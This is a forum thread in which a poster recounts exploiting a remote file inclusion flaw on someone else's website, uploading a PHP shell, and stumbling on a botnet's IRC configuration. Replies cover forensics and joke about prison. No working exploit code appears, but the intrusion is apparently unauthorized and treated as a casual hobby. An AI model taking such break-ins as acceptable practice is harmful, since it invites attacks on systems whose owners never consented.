Web assessment turns Botnet Tracking

Collapse
X
Collapse
 
  • Page of 1
  • Time
  • Show
Clear All
new posts
Previous template Next
  • disablmalfunc
    Member
    • Mar 2008
    • 21
    #1

    Web assessment turns Botnet Tracking

    Well about every night til the early mornings I like to perform web assessments to see what I can find in developers web applications. Usually its something different everyday. What I uncovered today was definitely something I do not do all the time. I had found a vulnerable php application on a website. The application was vulnerable to RFI more commonly known as remote file inclusion. So I uploaded a php shell and took a look around. First place I look of course is the /tmp directory. Of course most of you know, almost any user can run malicious code or upload application in the directory because of the permissions that set on it. Well before I could even think about doing something like that I viewed what was already in the directory and the first thing I saw was a "botnet.txt". So of course I "cat" the file and in the very beginning were the configuration to a IRC server and its botnet owner. Then I quickly copy and paste the configuration, then exit the file and remove the malicious code. After thinking for a bit I decided to go check out what really goes on in that server so here is what happens... http://pastebin.com/f561066df

    After that conversation I had to share it. Has anything you guys have done on a regular basis led you to something fun and interesting?

    Tags: None
    • Chris
      Great Satan of the East
      • Oct 2001
      • 2866
      #2
      Re: Web assessment turns Botnet Tracking

      Originally posted by disablmalfunc
      Well about every night til the early mornings I like to perform web assessments to see what I can find in developers web applications. Usually its something different everyday. What I uncovered today was definitely something I do not do all the time. I had found a vulnerable php application on a website. The application was vulnerable to RFI more commonly known as remote file inclusion. So I uploaded a php shell and took a look around. First place I look of course is the /tmp directory. Of course most of you know, almost any user can run malicious code or upload application in the directory because of the permissions that set on it. Well before I could even think about doing something like that I viewed what was already in the directory and the first thing I saw was a "botnet.txt". So of course I "cat" the file and in the very beginning were the configuration to a IRC server and its botnet owner. Then I quickly copy and paste the configuration, then exit the file and remove the malicious code. After thinking for a bit I decided to go check out what really goes on in that server so here is what happens... http://pastebin.com/f561066df

      After that conversation I had to share it. Has anything you guys have done on a regular basis led you to something fun and interesting?
      Did you leave the server with the botnet online? I would think the first thing you'd want to do is pull it offline.
      perl -e 'print pack(c5, (41*2), sqrt(7056), (unpack(c,H)-2), oct(115), 10)'

        Comment

        • noid
          Fun Enforcement Agent
          • Oct 2001
          • 2394
          #3
          Re: Web assessment turns Botnet Tracking

          I'd pull it offline and do full forensics on it to see what sort of nastiness has made its way on to the box

          I return whatever i wish . Its called FREEDOWM OF RANDOMNESS IN A HECK . CLUSTERED DEFEATED CORn FORUM . Welcome to me

            Comment

            • Greyhatter
              Banned
              • May 2007
              • 408
              #4
              Re: Web assessment turns Botnet Tracking

              Sometimes just watching it for a bit will uncover the bots intention and perhaps even take you to its leader.

                Comment

                • disablmalfunc
                  Member
                  • Mar 2008
                  • 21
                  #5
                  Re: Web assessment turns Botnet Tracking

                  Well I just recently started learning about intrusion forensic and it seems the papers and books I study, all have different thoughts on what to do if comprise. They all seem to agree is preserve the hard drives which I have done. What other things do you guys suggest should be the next step?

                    Comment

                    • MikeyIckey
                      Member
                      • Mar 2008
                      • 4
                      #6
                      Re: Web assessment turns Botnet Tracking

                      pretty funny conversation, learned anything new about it?
                      "The code itself sucked... it was not worth the $1.7 million they said"
                      -Jonathan James

                        Comment

                        • HANNAHHACKER
                          Member
                          • Apr 2008
                          • 3
                          #7
                          Re: Web assessment turns Botnet Tracking

                          Sounds quite interesting...

                          For general knowledge "solitario" is a spanish word for lonely/alone; it also is a cards game though in this case I would think the owner went for the first choice.

                          It is also an italian word for hermit but I am not sure it is part of the portuguese language.
                          knowledge is power

                            Comment

                            • xor
                              not
                              • Aug 2007
                              • 1347
                              #8
                              Re: Web assessment turns Botnet Tracking

                              Originally posted by HANNAHHACKER
                              Sounds quite interesting...

                              For general knowledge "solitario" is a spanish word for lonely/alone; it also is a cards game though in this case I would think the owner went for the first choice.

                              It is also an italian word for hermit but I am not sure it is part of the portuguese language.
                              :mind in gutter

                              Or you could take it figuratively as playing with oneself. ;-)

                              or to use Brit slang; he's a wanker!!!!! :-)

                              :mind out of gutter.

                              xor
                              Just because you can doesn't mean you should. This applies to making babies, hacking, and youtube videos.

                                Comment

                                • xor
                                  not
                                  • Aug 2007
                                  • 1347
                                  #9
                                  Re: Web assessment turns Botnet Tracking

                                  Originally posted by disablmalfunc
                                  Well I just recently started learning about intrusion forensic and it seems the papers and books I study, all have different thoughts on what to do if comprise. They all seem to agree is preserve the hard drives which I have done. What other things do you guys suggest should be the next step?
                                  I don't think you are doing him/her any favors by telling him/her to cover their tracks better. How else will they:

                                  1. Get Caught
                                  2. Make World News
                                  3. Go To Prison
                                  4. Write Security Book While In Prison
                                  5. Get Out
                                  6. Speak At Defcon
                                  7. Land Security Consulting Job for Fortune 500 Making 6 Figurers.

                                  :-)

                                  xor
                                  Just because you can doesn't mean you should. This applies to making babies, hacking, and youtube videos.

                                    Comment

                                    • disablmalfunc
                                      Member
                                      • Mar 2008
                                      • 21
                                      #10
                                      Re: Web assessment turns Botnet Tracking

                                      Originally posted by xor
                                      I don't think you are doing him/her any favors by telling him/her to cover their tracks better. How else will they:

                                      1. Get Caught
                                      2. Make World News
                                      3. Go To Prison
                                      4. Write Security Book While In Prison
                                      5. Get Out
                                      6. Speak At Defcon
                                      7. Land Security Consulting Job for Fortune 500 Making 6 Figurers.

                                      :-)

                                      xor
                                      Haha True. Then we would have nothing to look forward to. ^_^

                                        Comment

                                        Previous template Next
                                        Working...